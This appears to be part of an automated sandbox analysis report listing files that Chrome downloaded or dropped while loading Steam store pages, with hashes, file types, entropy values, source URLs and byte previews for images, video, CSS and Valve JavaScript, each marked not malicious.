        SHA1:EDCC9978B32C067BF7837EFA0F85978C17B4D7F4
        SHA-256:008E131346FE7C699029633AB3F7F0E0D04FF4A94FA44AF08A394C6FC8B840C3
        SHA-512:68D23BB43B58B570BDCC4277AA85E9B649F5E17ACBBD942E5307CB1C873B7325347B59A6C0A894DF22266CB13958BB66BB86E064FB449454A951874D870E4B14
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................................................................O..........................!1A.."Q..aq2B...#..3R....$br...%s.4C........5DSUcu.................................1......................!.1A."Q.2aq........B..#3.............?.y.Q.R.8..5.7..M%.....c...Xq..........$B.{.D).M....r.J_.{...0G.Np.;.....8.P.DW.B7U .M.@{2.....0.......`....`.} .+.A.V.EE..n....4..._...&&..0.qV*.@..dZ..[...!J..6E......hV.t.=...1..&.V....24.._L...2m..[.v...D...i.B.`.=O...le..4....f}..w..tV.V.}C..,Gkc.#'!6I.....THo....3.M...h/b."T.....l.j..m.....C.......|i....,......W.^0....-.at.k...5.}......[....f....3..~.:.7..q......q.o.b._.>..3a...?...&Vm.c74.N.,.....l.}N..Cw0.kC..e..TrL.yt.......NVZO......~...Jl....E.Uv.Da..\.47=.~...|[...=..2....sh.%....%lQ....8...n.6.h..M.i7=>.....w....5k+......o.dY.P.+.g;..W.2.o.....\U..j.#dys...2L.{.v..>..qv
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 600 x 240, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):238132
        Entropy (8bit):7.987622067912985
        Encrypted:false
        SSDEEP:3072:wEiwX4mWXUXAgCv3V10Cd5HfNA6JN8SKzNacFiVMO+OqOziRyPC9u2SqYv7jh/BD:JiNUQgSJd5F7n/T9zimC9iOohBIrXx6d
        MD5:508E88B11C5C905E6B05D77E789CFD39
        SHA1:1A817A529C47317FB3BED749FB59732D3710C9B8
        SHA-256:152C1F5897DA97B3A1BA141C9C0DB6D443FAEB7067063648675C9C76B6319609
        SHA-512:9D6C3B6DB3852B5D0064FBF62C89C267BEC7B7847EF96D6AA442BACD7CF295F497C7080DC0990AA9E34B138F21D3B5D09924826C6E00E573A066981D174D7431
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...X...........v....pHYs................KiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmp:CreateDate="2021-08-02T17:48:06+03:00" xmp:MetadataDate="2023-02-20T14:19:15+02:00" xmp:ModifyDate="2023-02-20T14:19:15+02:00" dc:format="image/png" xmpMM:InstanceID="xmp.iid:9ea35d4a-7fce-0947-af03-fae1927e
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 369x353, components 3
        Category:dropped
        Size (bytes):14577
        Entropy (8bit):7.864346510667554
        Encrypted:false
        SSDEEP:384:JT7C8EzMfitRkllhOVNewoTmiT1PYL03tgUhhC8x7vNUZ0rj9:JT7C8Ez+inkP1LKzUhhC8xWKB
        MD5:9657670EEFB782A590993D109F8432C5
        SHA1:0E7FDA37E045A70DC19E9432DA502BBC008703D8
        SHA-256:06BE12F654ACEC50204D5BE9B5E054E3C1EBB62CE0FFA8821F8C65055BAB92E6
        SHA-512:30C72EC34D61A647D2DF5DFC3477940F5A90993DCB1F3E479E141510B054E97BB3A7B57675D48CAF756FDF7D0A2F6D0E1EF1D6E0CD13143BF7CB584EF5D14923
        Malicious:false
        Reputation:low
        Preview:......Exif..II*.................Ducky.......Z.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:AFC2F315A24911E6B6C8933CD867CC7B" xmpMM:DocumentID="xmp.did:AFC2F316A24911E6B6C8933CD867CC7B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AFC2F313A24911E6B6C8933CD867CC7B" stRef:documentID="xmp.did:AFC2F314A24911E6B6C8933CD867CC7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...........................8.....................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):5605
        Entropy (8bit):7.901001607711293
        Encrypted:false
        SSDEEP:96:/CA5+aN68CwIqOUXDduBNZhyoxeaztEYYaV3zeiJv5uYbfILMtBPk:KG7BxmNPyoxeazGQLvQjj
        MD5:B625FAA46A58221DC1D696348B658299
        SHA1:747CF78156F8C397BF4325F9C614D883E6F034A8
        SHA-256:1D1A6C9477DAC11EDE660D1BD2A3F28447AADDDDEFF96047E79A106F636CE0EF
        SHA-512:F0B4BC7BA147FA8B86ABB6C69C4F22E38A515D8EF97F27EFB8EAB638070B74756EA19846468265A6E2CCA5A6F87B947D35D848EAB2B9B7582873D1057407FF3A
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/489830/capsule_184x69.jpg?t=1701807334
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E..............................................J..........................!.1..AQ."aq....#2..3B.....$&4R...%'6CETbc........................................................!1A."2Qa............?..t...}u`..+8..u.....mT...@f.s..`t....$.=t...1.I....#.G.9.x.C..?m..(.(....L.i ....:bR.GR.H.....C..#.....L4='8..L4=<r8..{.'..x...5.c.PA....n5#0.o...q...&...V-KfO.e.9......<S..}...=.i..}..}5|..u.........4....P. ..h.iIS....JH..p.$.X.5.W#._......).T...Om..{`))...X.x...K....)W..5...3......K.(...rG>..8...p..{..?..s.U..o.;.~.P...4.G.{f....l....EM/%.$Kz7.0.ISn$.T.'.....U.+......u.X...i.Z\f....Gy.c.du...T.4.....x.1..b...Un8.\...h.&..2.b....?..h-.R.V[.@.z.BIhxi..5.t..@n,(.(.).....".....w..P#ENS.z..#....u<9R6.[z5...6..t.....).-....K]-....e..).x........h......M2_b8m.MH...D..@fq..1K.K.o'.Hz..x`.J..I...Ji.Nq....2..9
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (727), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):892
        Entropy (8bit):5.511509979432098
        Encrypted:false
        SSDEEP:24:+Tuj0z//T19x54f4AW4oGcsMGPo5cr6cOjYRpBRptT:+Tuj0//T1LX4LVo5UdF
        MD5:1F43D42889C7F26491189FDA38EEF288
        SHA1:C650D02D0319A12143F7D5095099375AC6881456
        SHA-256:A27EB7B892823107888CAF6F4914F690DECB2D0EC2AD6516B0C88D3B512B85F1
        SHA-512:119882D70867F74ACF0C3B30B9C1F6C7630C786889C5D4EB33CD0BB1EDF0F2D1274692C80502F12F4E896D1163009A0A2D7B59C7533416481EB98E9805D18286
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/applications/store/login.js?contenthash=91407ead080f1c8a8e4c
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/..(self.webpackChunkstore=self.webpackChunkstore||[]).push([[4535],{24125:e=>{e.exports={LoginContainer:"_2kLRmRsLwjGDlm-ZfUpChG"}},9084:(e,t,r)=>{"use strict";r.r(t),r.d(t,{default:()=>c});var n=r(24125),a=r(47427),o=r(99327),s=r(22791),i=r(37563),l=r(35791);function c(e){const{redirectUrl:t=i.De.STORE_BASE_URL}=e,[r]=(0,a.useState)(new s.J(i.De.WEBAPI_BASE_URL).GetAnonymousServiceTransport()),[c,u]=(0,a.useState)(!1),m=e.guest;return a.createElement("div",{className:n.LoginContainer},c?a.createElement(o.pT,null):a.createElement(o.wK,{autoFocus:!0,transport:r,platform:2,onComplete:e=>{e==l.TG.k_PrimaryDomainFail?u(!0):window.location.assign(t)},redirectUrl:t},m&&a.createElement(o.bU,{redirectURL:e.redirectUrl})))}}}]);
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):136649
        Entropy (8bit):5.309199903765689
        Encrypted:false
        SSDEEP:1536:bZuIBobvWn/B3xfemT6kPKE8wt/1YJO0MMxZTEZ5jpYwr0svwWVjg9WN:bNukPKE89AfMwZ5jWs0svwWVjg9u
        MD5:2A6A3C40DBD92ADF5E44A5E67F9AC706
        SHA1:E497890E0E4C6806C36E8DED64598F08CBCEC540
        SHA-256:4E1728686DC4927BE2044DA844F63BDAF694FE9A6F8BC016F1D826FFA370D6B6
        SHA-512:5D834B197019A2FAC347ABBC15F6496EEAD35F6B5F16CEC695A07A6CF82E3AF71845FCCD83365BF9CE942E2DB7B91B35A583BC82C01984628A2C9026774959BC
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/css/v6/store.css?v=fqF6X6wSBa3N&l=russian&_cdn=cloudflare
        Preview:..* {...padding: 0;...margin: 0;..}....img {...border: none;..}......a {...text-decoration: none;...color: #ffffff;..}.......a:focus {...outline: 0px none;..}....a:hover {...text-decoration: none;.. color: #66c0f4;..}....a.nohover:hover {...text-decoration: none;..}......html {...height: 100%;..}....body.v6 {...position: relative;...min-height: 100%;...font-family: Arial, Helvetica, sans-serif;...color: #c6d4df;...font-size: 12px;..}....body.v6.in_client {...background-position: center top;..}....body.v6.game_bg {.. background: #1b2838;..}....body.v6 > div#global_header {...border-bottom-color: #171a21;..}.....v6_bg {.../* background: url( '/public/images/v6/tag_browse_header_bg.png' ) no-repeat center top; */..}....body.blue .v6_bg {...background:....url( '/public/images/v6/blue_top_center.png' ) center top no-repeat,....url( '/public/images/v6/blue_top_repeat.png' ) center top repeat-x..;.....min-height: 370px;..}....body.v6 div#store_header {...background-color: transparent;..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
        Category:downloaded
        Size (bytes):38554
        Entropy (8bit):7.281917544628079
        Encrypted:false
        SSDEEP:768:PcaDYrV5KBau+3erpKn9jpe7z9mWAFjQcR4D9DQ0LKfjLh:PcsiV5Y+erc9T/H4f0jLh
        MD5:231913FDEBABCBE65F4B0052372BDE56
        SHA1:553909D080E4F210B64DC73292F3A111D5A0781F
        SHA-256:9F890A9DEBCDFCCC339149A7943BE9AFF9E4C9203C2FA37D5671A5B2C88503AD
        SHA-512:7B11B709968C5A52B9B60189FB534F5DF56912417243820E9D1C00C97F4BD6D0835F2CDF574D0C36ECB32DBBF5FC397324DF54F7FDF9E1B062B5DBDA2C02E919
        Malicious:false
        Reputation:low
        URL:https://store.steampowered.com/favicon.ico
        Preview:............ .h...V......... ......... .... .....F...00.... ..%............ ..R...D..(....... ..... ..................................u...t...w.H.z...|..}...}...|..z...w.I.t...u...........p...f...e...j...k..k...l...m...n...n...n...m..j...e...f...q...Z...Y...]..._...w6...T..{;..`..._..._..._..._..._...]...Y...Z..~K...P...O...{I............P..R...S...S...S...S...S...R..~K..t@.I.Q!.{T.....................M..zF..{H..{H..{H..{H..zG..yE.I..................................zJ$.m9..o;..o<..p<..p<..o;.........................................eM.p@$.c0..d0..d1..d1..............xP<.g9#..hW..........................~o.],..Z(..Z)...j].a7$.P ..O...P ..O.....v..........................dV.O...Q"..F...H...I...I...I...H...Q&...........................H...I...C...C...C...C...C...C...@....rg.......................C...C...?..I>...>...>...>...>...=...Y:*.....................x^Q.<...?..I=...:...:...:...:...:...:...9...mUG.............ti.=...:...=...7...7...6...6...6...6...6...6...4...@%..R:
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 616 x 353, 8-bit/color RGB, non-interlaced
        Category:dropped
        Size (bytes):361603
        Entropy (8bit):7.99368048098768
        Encrypted:true
        SSDEEP:6144:FRD0YFYTFRBALirJaubbTovnLMUx+pFQcgLyD/5AfxzhTRcpT8:I/BAZubbaHOBgLaIxspT8
        MD5:E722A7FA3D413EC1BAE583B6720A862F
        SHA1:86F8B4FCB2839DA968D1400863153476BC1DF2A7
        SHA-256:821E813FCDD4165505CA63FC04DB3AF38928E959B9B683DBAD2B3ED64C9183F7
        SHA-512:0E8DE51BC0801D659E27E60EAB44A758FE62AB7B47ACC93FFAA5D6A08B79854471D0A7C9CC095CDB9627178AFE4D568F0502737E42A4984C0A02A2EEA36A8629
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...h...a.....Kj.K....pHYs............... .IDATx.D..dYv.....^w................(J| ..Lo2.w....O...$.I.... Hv.].]c.1.p..K..x....*3...s.^......A..)$..i....a".D7h"M.d......m.R..... .v.L.@H..2...F'( !.A.i#-...'........"..*.4D..9.Bt...`.p.$`.I..M@.e& .f..l'..`..i.......z\...."...I.V......A.d...-A=V:h..;Epr7`);222..{.N..0....N#....R.a....E.S.L..hP.i...I..3!.HK..N.15x.`v....0....R.....S`. `.`.%e..F.X.`..-:a.$2C..a..l...D...$.*..h....){s.N.HH...e..jB3.td..$I.C...JBhS.$...D.6a.H.iA.{{.b.%.R...H'((I4....Nu.lg...l:!%..%ePH...i...i.v.h...0.....1..;3LHp..{Hn..l.L8C..i..'8L.+@....`...)i.:.:jI.w(M.......vB`..HwC..I..c.!&d...@.L'IIH.l$.......@.f*....%.c..K...f.F.I....0)...0;..>..;.....~............z......../.............o..........t...q../K....C....xZN.\=9.^.....us..=...........7_.._1....\~....?<.y:.%...........v.c.\.o.).B.p<..{_......O.f.R(.v...}.g.6....0..u.AYj....E.yZ..........~..v..>0....pwxx.6[g_.B....f.....x....E\?}.../.|}O.g.}.m?...d_.y.9...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):9548
        Entropy (8bit):7.957598163788815
        Encrypted:false
        SSDEEP:192:DW5rC2uaaS7/2YIrRhOp5Xq4In3lNc+dnJslFGb5+R:i5e2taS2YsRhUXq4It2lb
        MD5:37BF242FD3DB3C9225149A3B79FA9E0D
        SHA1:99947B23BB9DF12A8596926112C4C91278923AF3
        SHA-256:0CC0AF62CEE59FE2CAEE93B9919345FA2FF47EF0719AC04F2368B79CC5DA8A01
        SHA-512:4D599ABD5E16092E2C4545177F4E4FB4F4C31262C78EEA7E85E9A44541E82A7E0B2EAD44B76FF41897D583B8F4086F1466496B955CE438A960AC667B83A76A46
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................M...........................!.1.."AQa.2q.....#$3..5R.....'tu.BCDEbdr........................................=........................!1.AQ..aq....."R.......24B..#.$b.r.............?..ugV.Y...d..0K,.*r+kH.$.....8........=/....{.a..ScvV....5.[.{.N.\f.....CzL)...P..!.).).X%.q.....;g.Z..}...o.u...:.o.....G.m...#...:...&+./jRV..)..)H.....}..X.....[.c..4...k.2...>8.%70y<..0.hy!..4.P...V.U...(r8.T.s.<\....D..n.$...:..^......*....l.W..fdw...)F.....q.<.k3eR.q...GrB..S...W...P.8...(.........Hx....iQ......nt...]8....,.....G..;.y.E..3..T|mg&nY.N#.J9....lj2m.o.rN....3.......K...6$B`[..N..}=..O.t6..3....7%V...-~a1.8.#.....H|..{..A..OL..V.V...k.......zN...9'E..3...........o#....p.G..>....Oc<..~;....M....p>H......$....g..c..xu...=_d...p.J..{Gr.5h...x..x..G.........J...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:WebM
        Category:downloaded
        Size (bytes):511151
        Entropy (8bit):7.9974412304832585
        Encrypted:true
        SSDEEP:12288:zwOx7QVmtCbAGPfuNglKbosAM7FOMRn9BpBMYQQjr0k6tUU:+V2IA9FbDh7Fx9BpXp0k6tUU
        MD5:D07FE0483ACBC3805F1E48CB971C606D
        SHA1:A8D9FCDE781B5045CF6572297DAB853097A2178D
        SHA-256:1B8A56DA98C2552790865D9295586B5116C9F2F08CDF69BB4479432F249C6380
        SHA-512:03CF0C25EA172525572CE45687207854A3A5D9C7A69D44B2DE295529DA7205322846D611BAF9F2DCAA48235796EEEE4568439CC201EA9FDFD53CFB19F2001232
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/clusters/sale_autumn2019_assets/54b5034d397baccb93181cc6/deck_banner_animated_webm_mobile_english.webm?t=1713912919:2f77e586e81b9e:0
        Preview:.E..B...B...B..B..B..webmB...B....S.g.........M.t.M..S...I.fS...M..S...T.kS...M..S...T.gS...LM..S...S.kS....i........X.........................................................................................I.f.*...B@M..Lavf59.27.100WA.HandBrake 1.6.1 2023012300Da..5.NA...D..@........T.k........N..s......._...."...und..V_VP9...#..|k-.......U..U...U...U...U...U...U....T.g.ss.c..g.E..ENCODERD..Lavf59.27.100ss.c..c......._.g.E..DURATIOND..00:00:07.967000000...C.u%..... J......I.B`.0...8$..\..x..._3.?.._....o.<7..\..o.....k.Ov>..._.../.?.....w..6?......~?..4/..Z..~1...K.%-7.OQZ.K,..~.2..PA..qWk(.........-2x.a.#.9....C%Gq.........&....uv.jDM.u.....hc.QA.t..!...%oz.3,.K...k...WN....&.N. ..$h..T.-.g&.]eQ.+.,.1p.}.R.~M..k) ..]...:.....M..5Yj....dF.]/h....+...\.....*.>F.t(/.n5c..P...w.A=....Pf.l.wM...M.....tP}M..(.._Jj..#.{...!g.I..&.<..A.R...z...!...<&..I..#..x.....:...E....z.:5!w......f.3..8.".s....?.<aU1.s...ap8....+.D...I.g.....imz......>*3..........c..Qq4..:.S
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (19987), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):20152
        Entropy (8bit):5.336413914084772
        Encrypted:false
        SSDEEP:384:+yBIOCWaxNWJb2ucCJRGZ43ftUwP/0os2Ld92Be8+n8swzuDKCiMeb94MHpSnVA:ghsbhNJZ1tQ2hxUzGSb94MHpSnu
        MD5:96DE48CBDACCD9BF92DEC79EF68BFF19
        SHA1:1D8AE62DE333E955DE1DC09C8D95ED00D1AF782D
        SHA-256:9A761000BC864C2DEAA03AC931379B6FAD6C80443304F0D7CBE9FCEF64F1BAF2
        SHA-512:9DDE4E494AA57E8BCE68AAB25057D2FC1923922BAEF326D5FA1E80C0A978C94F75FD27EDF8E329AA88F50BC7AAB57636EC83F31972CE8E99CBEF5CCEB5CF0AF6
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/manifest.js?v=W9MNYExkE1nV&l=russian&_cdn=cloudflare
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/..var CLSTAMP="8913299";(()=>{"use strict";var e,a,n,s,d,c={},f={};function o(e){var a=f[e];if(void 0!==a)return a.exports;var n=f[e]={id:e,loaded:!1,exports:{}};return c[e].call(n.exports,n,n.exports,o),n.loaded=!0,n.exports}o.m=c,e=[],o.O=(a,n,s,d)=>{if(!n){var c=1/0;for(i=0;i<e.length;i++){for(var[n,s,d]=e[i],f=!0,b=0;b<n.length;b++)(!1&d||c>=d)&&Object.keys(o.O).every((e=>o.O[e](n[b])))?n.splice(b--,1):(f=!1,d<c&&(c=d));if(f){e.splice(i--,1);var r=s();void 0!==r&&(a=r)}}return a}d=d||0;for(var i=e.length;i>0&&e[i-1][2]>d;i--)e[i]=e[i-1];e[i]=[n,s,d]},o.n=e=>{var a=e&&e.__esModule?()=>e.default:()=>e;return o.d(a,{a}),a},n=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,o.t=function(e,s){if(1&s&&(e=this(e)),8&s)return e;if("object"==typeof e&&e){if(4&s&&e.__esModule)return e;if(16&s&&"function"==typeof e.t
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x77, components 3
        Category:dropped
        Size (bytes):2904
        Entropy (8bit):7.839567999383945
        Encrypted:false
        SSDEEP:48:6uERACUc0qgCH9MCFgP7yEZpOXmhVSdI8jkOfwKKT:NEd/oCH9MnGc8KV5
        MD5:20818CCA0E5E263A92BC72405B8CFF84
        SHA1:214A2311A098C512390330C374E1EA53FBE76D20
        SHA-256:8B19A13D5B57F82E9661ADE91084B7034D64BA5F1FA757AC7DCBABCF8E493F50
        SHA-512:16A925B4C21D14798F6DC298C387C9D32DEE794C075D4AADF47381434E6AD0E2BCFDB1EAB7828F0419A4CF457803BFBA18E37B4F1E3402C45575F3A0E7094F73
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................M...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.R...RG...Fx.H..z../.0:....u499=....!.sQBp[9.*..;NN~...n.....a.........l...e.......9.B:.._.3V...=..8.z...n..G.[...f(.d|.<.......4w...W..7...r....Oo.. .O...Z..a5}Q.?.S\......g|.g..........2.....y....5.7.m..g.-8......o...M>...-..y_.)-&.,A.01.k+3).j'..w....%...%..,1K${.@..8..9.^[...F.Y..np...Pq.{......\......@$.s..}+....m.]..F....gh..@..Oj.Ri^..j.m.|m.$WR..*..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):3800
        Entropy (8bit):7.888824928639614
        Encrypted:false
        SSDEEP:96:vYCaNZSMidLMw1TtW42HRde+5rDVPfbry8Q5ljTLLH:paNML1TU4IPX5rDZHyzlfH
        MD5:EAB258C02D98827C6FC64763FEA5F730
        SHA1:E52DC1C16C0F4677DA7A604A93454E081C316C46
        SHA-256:574C1CD490945FE1112EA2083B0B9987BD6D5703544C8EDC6204AD4A954BA9E4
        SHA-512:ED038A92A931DF22152B749C195AEBB40D9E4D537FC747C57BF29DD286992943983CDE6B1EF8F1D9D63A9C6310E5CF65D450BCED76C7453D3C605A9D5CDCED21
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_33db24b3dddd9e823e6556a739141c3f9ffd45e8.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................A.........................!..1A.".Qaq.#234r......s...5BC....7b...................................6.......................!1...2AQ."a....q.#4Bb..3r...............?..)..Hm..6.%)y.\........:.e."...oc=].....c.y...P.h...nS)R.)o.. ..r..........N......\.\.*.>...!.P.......*..p...>y.w...\8b..o..)...rLu.\Z.Zs....~..........W...~r.pt.....>n....V..2s.).l.<..u.;.....5c].VZ...Z<3...L...a......P...u.........<"y....o.)#>..t-^.z...1V.I.|.Z..&go.!..8.6.HR.0A...a..D[..ca.l.Hg.<.W.;.Q8...p....4x..s....MlM..JF}..yq1.4.>E.gPZ2...`..k.&..vS.S.1..kl.y.7....*:.G....G..`.ut.Q.dz.fg./.N....Z.6..[V...a.>.]_e...$...} ./\....g=.U.M.S.A[.6t..HB...../G.K.'b}7..U[..p>..!....~.cqWh.q)...?H.=.3.".+...'.OS.......8....i..5)-.B.....M!~T$...%X$.....jU.)N.NM4.$.3).Z....6.%.R.;.....^...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):4211
        Entropy (8bit):7.886769133631847
        Encrypted:false
        SSDEEP:96:vpOASHOT12Dt2aZsCOfoFnEiZ+A1qmK/yM:BSkcAaiAhXZ+AVlM
        MD5:E51E58E7339247433AD856178100168D
        SHA1:36DD988DDCB3F46C77F190831B986ED83EE2F022
        SHA-256:30D24E4C4E938213A76DD2DFD93A21F9ADD1E19345E93A14F2C5D53F933FC262
        SHA-512:13290503DA4308234D539B3383D77F143C79A8DA0E0F1888AFC7ACD44A5F7964B5E08421544769C2FE699A26F1817F7F10CABC849CE64193334B8A384843624B
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_094771ed093096d586f3050e25d3647e7a684c6c.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................B........................!...1.AQa"q..2..$35r...#46Bst......Rbu.................................*.....................!..1AQaq."...2BR...............?.jQ[.H...U..F1.v.4..G..:..7.g...y)LNB.H..M..#..e%..5..V...I...\m..4.'...MSj.,.].2...g'...=.Fq.(.<....7C.7X.r..4....u.,..)P.9...y.mb.n1i.t.f..*../v.w.x.U.k.....a.F%u...F.m...S..wn.....*)...".zn)..aryk$.L.T...v$#c.~G..M.O.2..p...)"J.....iy.3..'.5e.. ..Vn..5.2E......)...r........Q|.!.....9k..n.w...'U ....?.H..lk$....'....|[Yb..-.l.KMU..G...|...d.c...N..M.......,.k........&..ET.z..*.....F....z..t.>:....T...)..jKR0....l....PH..T:lU......T..._.N..I.6........$...:_...v.c.{..S=4.p.t.p..{.....\...lU..QQ45.T....jd.2.U..q.dc...=N)....D1...CZ..MM.jd.RR,.)8?.I...3S.,...Y...`."id....)..,C..O..}..V...7x%p....mR[#..;}.J.hyd
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):1048576
        Entropy (8bit):7.996495906200296
        Encrypted:true
        SSDEEP:24576:Vtv0G5f3rr52OQXTz1ix6ne55PaQqdQIeoe:n33az1kEQqdQIeD
        MD5:60197E956E19C1E1B818130E524A53A7
        SHA1:318E133E60A2271C3B8E69909EE542F6A470BE5D
        SHA-256:7763C53E9DCB9168A8C0A6E9CA6358900BA5858A8A00233465084FE74C0408EE
        SHA-512:90CCC8166FC5CFF9F9DDA591E14DDCD233530786C93C524E0F4313689B64D16A8AAFCBF87323FF62606D379D05026687666A93DF01AA441CB2A0DEB6475DB53B
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256923250/movie480_vp9.webm?t=1705420839:2f77e582f0cba3:2
        Preview:{..n....H..sb.$.|......:|.7.a.N&w...E..A....A..x..(...0V....@.%)....%+g..%.v<$...U...|[.....:....}Hj.."....f}..|..P).Y.5...!.G..e...jjt.b.HL.z.. .Ef.z?.4.u....G)...[.......)a.M.E+c$.8.\.....P/.gP.,e*..H>.\..5...P..S.q...).....m....<.v....a..e~W.~H=;..(.B...%.'....5Y.M...w..v...1M1y.Dz(8.u...q.a........?.....3..":NK.......=.........I..S1wEj...C......8..Y^ ...@......&.....(...Do.a.l.......E.J..q.C.C.u.m.t..d#h...I0..? .......8H!)4.5....5:Z.d.....enH..v.z..mZ=;...3.4.v.UB....4^7%..~...6....q.q.T...=..L..(.6t{`j...%E.....R..._,l....{....g..gyhA.k......L..G%HNBw..-We9...sR.6i`.KU....W.....H.4.....<.. .../......R.... w.R)Bq[..........D..?2.G.!+T. 7..Jic....[qTA.4Y+._.gSfv..S....G5m.E.U..5.mP^....-.k..e`...a....al..e\..Gs...J......h...y...8.^DCg...c$..).;.....-y.4.~.....IN....+gs....+....r.Z.w;.{..E..?...n..e..8N..g.....1.r..P........z...8!.<.......PM.I.+2.K.z..|.[u._8-..0..Q.v.....qP...D..;.qq...,.u...!.c.E....oZ..wk0lU..6....f..S.u..{..rL.^
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):545
        Entropy (8bit):7.444562549583052
        Encrypted:false
        SSDEEP:12:6v/7uyLaH660d23xvW7xQ/8Dbw7Xf1iE5i6+kkACy4N:za6083aS/8Dbwv1iEYvK4N
        MD5:89CDC062C8ADEB86C0646386B16BE89A
        SHA1:E14D6483C5CC89FCFBD81D716EC6160F211011D0
        SHA-256:ACFA81026EF1DBB82A8276FAB382C15433934AD82C80DCAD64F87FD907F447F2
        SHA-512:3F288464BAC7875BD1C63800543056BA8A576F973FE26D374AAD1853AC4F25AF0CD3AF74002130200CF1B16D76AD3896888D26065E10AC7D731F0B638236E183
